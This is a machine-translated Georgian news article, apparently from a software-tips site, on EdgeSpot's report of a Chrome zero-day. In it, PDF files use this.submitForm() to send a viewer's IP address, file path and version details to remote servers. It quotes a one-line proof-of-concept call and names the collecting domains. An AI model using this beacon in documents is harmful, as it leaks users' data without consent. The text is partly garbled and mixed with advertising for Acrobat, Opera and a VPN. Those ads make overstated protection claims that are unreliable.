- EdgeSpot– მა აღმოაჩინა დამაინტრიგებელი ნულოვანი დღის დაუცველობა Chrome– ში PDF დოკუმენტების გამოყენებით.
- ეს დაუცველობა შეიძლება ზიანი მიაყენოს თქვენს კომპიუტერში მგრძნობიარე მონაცემების მოპოვებას.
- შეისწავლეთ ჩვენი ვებსა და ღრუბლის გვერდი სხვა ინსტრუმენტებისა და სერვისების შესახებ მეტი ინფორმაციის მისაღებად.
- თუ თქვენ ბრაუზერები გაინტერესებთ, მათ შესახებ უამრავ ინფორმაციას გთავაზობთ ჩვენს ვებ – გვერდზე ბრაუზერების ცენტრი.
ყველა თქვენი დოკუმენტი ხელმისაწვდომი და უსაფრთხო გახადეთ Adobe Acrobat Reader- ის გამოყენებით. დოკუმენტის მართვის ეს საშუალება ასევე მოგცემთ ელექტრონულ ხელმოწერას და შექმნით ოფიციალურ ფორმებს, რომ დაზოგოთ სამუშაო დრო. მიიღეთ ეს თქვენი კომპიუტერისთვის და თქვენ შეძლებთ:
- გახსენით, დაბეჭდეთ და შეცვალეთ თქვენი PDF და ფაილის ყველა ტიპი
- შეავსეთ PDF ფორმები უფრო მარტივად
- თქვენი ძირითადი დოკუმენტები დაშიფრული იყოს
მიიღეთ ყველა აპლიკაცია სპეციალურ ფასად!
მსოფლიოში Nr.1 დოკუმენტის მართვის პროგრამული უზრუნველყოფა ახლა უკვე ძალიან კარგ ფასშია, იჩქარეთ!
ექსპლოიტის აღმოჩენის სამსახურმა EdgeSpot დამაინტრიგებელი აღმოჩნდა ქრომი ნულოვანი დღის დაუცველობა PDF დოკუმენტების გამოყენებას.
დაუცველობა საშუალებას აძლევს თავდამსხმელებს მოსავლის მგრძნობიარე მონაცემები Chrome- ში გახსნილი მავნე PDF დოკუმენტების გამოყენებით.
როგორც კი მსხვერპლი გახსნის შესაბამის PDF ფაილებს Google Chrome- ში, მავნე პროგრამა იწყებს მუშაობას ფონზე მომხმარებლის მონაცემების შეგროვებით.
შემდეგ მონაცემები გადაეგზავნება დისტანციურ სერვერს, რომელსაც აკონტროლებენ ჰაკერები. ალბათ გაინტერესებთ, რა მონაცემებს წოვს თავდამსხმელები, ისინი თქვენს კომპიუტერზე შემდეგ მონაცემებს ასახავენ:
- IP მისამართი
- PDF ფაილის სრული გზა სისტემაში
- OS და Chrome ვერსიები
ფრთხილად იყავით მავნე პროგრამებით სავსე PDF ფაილებზე
ექსპერტები ლაქებიანი რომ ორი დომენიდან ერთი readnotify [.] com ან burpcollaborator [.] net იღებდა მონაცემებს.
მათ გამოავლინეს, რომ თავდამსხმელები იყენებენ this.submitForm () PDF Javascript API მომხმარებლების მგრძნობიარე ინფორმაციის შესაგროვებლად.
ჩვენ ის გამოვცადეთ მინიმალური PoC– ით, მარტივი API ზარით this.submitForm ( http://google.com/test’) გააკეთებს Google Chrome- ს პირადი მონაცემების გაგზავნას google.com- ზე.
Chrome- ის ეს შეცდომა გამოიყენა მკაფიო PDF ფაილების ორი განსხვავებული ნაკრების მიერ, ორივე მათგანი გავრცელდა, შესაბამისად, 2017 წლის ოქტომბერში და 2018 წლის სექტემბერში.
აღსანიშნავია, რომ შეგროვებული მონაცემები თავდამსხმელებმა შეიძლება გამოიყენონ მომავალში თავდასხმების გასწორების მიზნით. ანგარიშების თანახმად, ფაილების პირველი პარტია შედგენილია ReadNotify– ის PDF თვალთვალის სერვისის გამოყენებით.
მომხმარებლებს შეუძლიათ გამოიყენონ სერვისი, რათა თვალყური ადევნონ მომხმარებლების ხედებს. EdgeSpot- ს არ გაზიარებული აქვს PDF ფაილების მეორე ნაკრების ხასიათთან დაკავშირებული რაიმე დეტალი.
სწრაფი რჩევა: შეცვალეთ თქვენი ბრაუზერი ოპერად
ამ პრობლემურ პერიოდებში, ყოველ ნაბიჯზე ჩვენ თავს ესხმიან მავნე პროგრამებით, ფიშინგებით და ტროიანებით, ამიტომ ბევრად მეტი სიფხიზლე უნდა გვქონდეს და დაცული ვიყოთ.
რადგან ეს არის Chrome- ის სპეციფიკური პრობლემა, შეგიძლიათ თავიდან აიცილოთ ეს საფრთხე და ყველა სხვა, უსაფრთხოებაზე ორიენტირებული ბრაუზერით ოპერა.
ამ ბრაუზერს მოყვება ჩაშენებული რეკლამის ბლოკატორი, რომელიც არა მხოლოდ ასუფთავებს ასეთ ყურადღებას, არამედ ბლოკავს თქვენი მონაცემების შეგროვების ანალიტიკური სკრიპტები, თვალყურისდევნების პიქსელები და მეთოდები.
თუ გსურთ დარწმუნებული იყოთ, რომ თავს არიდებით ნებისმიერი საფრთხისგან, ჩამონტაჟებული ჩამორჩეთ VPN მომსახურება, რომელიც 100% უფასოა შეუზღუდავი დროით.
ოპერა
Opera გთავაზობთ სრულყოფილ დაცვას საფრთხეებისგან, ჩაშენებული რეკლამების ბლოკატორებით და VPN სერვისით უფასოდ!
ეწვიეთ ვებგვერდს
როგორ შემიძლია დაცული ვიყო PDF სისუსტეებისგან?
ჩამოტვირთეთ Adobe Acrobat PRO
Adobe და Chrome კარგად ემთხვევა PDF ფაილების მართვას. Chrome- ისთვის Adobe Extension- ის ინსტალაციით, შეგიძლიათ გადახედოთ და მანიპულირდეთ PDF- ები თქვენი სურვილისამებრ, თქვენი საყვარელი ბრაუზერის დატოვების გარეშე.
ძლიერი სტრუქტურის მიუხედავად, PDF ფაილებში დამალული მავნე პროგრამა შეიძლება ვერ აღმოაჩინოს, თუკი მკითხველის სტანდარტულ ვერსიას იყენებთ.
რეკომენდებულია პროფესიონალური ვერსია, თქვენი გარანტიის უზრუნველსაყოფად და თქვენი მონაცემები შორს დაიჭიროთ ჰაკერებისგან.
მიუხედავად იმისა, რომ ეს არ არის უფასო, ფასი, რომელსაც თქვენ გადაიხდით, საკმაოდ მცირეა დამატებითი ფუნქციების სიმრავლისთვის, რაც თქვენ ისარგებლებთ PDF ფაილების გაძლიერებული უსაფრთხოების ჩათვლით.
აქ ასევე არის 7-დღიანი უფასო საცდელი ვერსია, რომ შეძლოთ Pro- ს სრული გამოცდილების დაგემოვნება შეძენის დაწყებამდე.
Adobe Acrobat PRO
თავი დაანებეთ მავნე პროგრამებს Adobe Acrobat PRO ჩამოტვირთვისას. მას აქვს უამრავი სხვა ფუნქცია, ვიდრე უფასო ვერსია და თქვენს მონაცემებს უსაფრთხოდ ინარჩუნებს.
ეწვიეთ ვებგვერდს
იმ შემთხვევაში, თუ გსურთ უსაფრთხოდ იყოთ ინტერნეტში სერფინგის დროს, თქვენ უნდა მიიღოთ სრულყოფილი ინსტრუმენტი თქვენი ქსელის დასაცავად. ახლავე დააინსტალირეთ ინტერნეტის პირადი წვდომა და დაიცავი შენი თავი. იგი იცავს თქვენს კომპიუტერს თავდასხმებისგან დათვალიერებისას, ფარავს თქვენს IP მისამართს და ბლოკავს ყველა არასასურველ წვდომას.
ექსპლოიტის აღმოჩენის სამსახურს EdgeSpot- ს სურდა Chrome მომხმარებლებისთვის გაეცნო პოტენციური რისკების შესახებ, რადგან არ იყო მოსალოდნელი, რომ პატჩი გამოვა უახლოეს მომავალში.
გასულ წელს EdgeSpot– მა Google– ს შეატყობინა დაუცველობაზე და კომპანია აპრილის ბოლოს დაპატიჟების პირობა დადო.
ამასთან, შეგიძლიათ გაითვალისწინოთ პრობლემის დროებითი გადაჭრა, თუ გსურთ PDF ფაილების ლოკალურად ათვალიეროთ სხვა მკითხველის აპის გამოყენებით.
გარდა ამისა, ასევე შეგიძლიათ გახსნათ თქვენი PDF დოკუმენტები Chrome- ში, თქვენი სისტემების ინტერნეტიდან გაწყვეტით.
ხშირად დასმული შეკითხვები
Დიახ, ეს ასეა. თუ გსურთ უფრო ფართო არჩევანი, შეისწავლეთ ჩვენი საუკეთესო არჩევანი ქრომიკონფიდენციალურობა გაგრძელება შიგნით ეს სრული სახელმძღვანელო.
თაქ არის ბევრი გაფართოება, რომელიც საშუალებას იძლევა PDF ფაილები დამუშავება. Ჩეკი ჩვენი შესანიშნავი მეგზური Chrome- ის საუკეთესო PDF გაფართოებების შესახებ.
ეს არ არის, მაგრამ შეგიძლიათ სწრაფად გააქტიუროთ. აი ჩვენი ყოვლისმომცველი სახელმძღვანელო თუ როგორ ჩართოთ QR კოდის გენერატორი Chrome- ში.
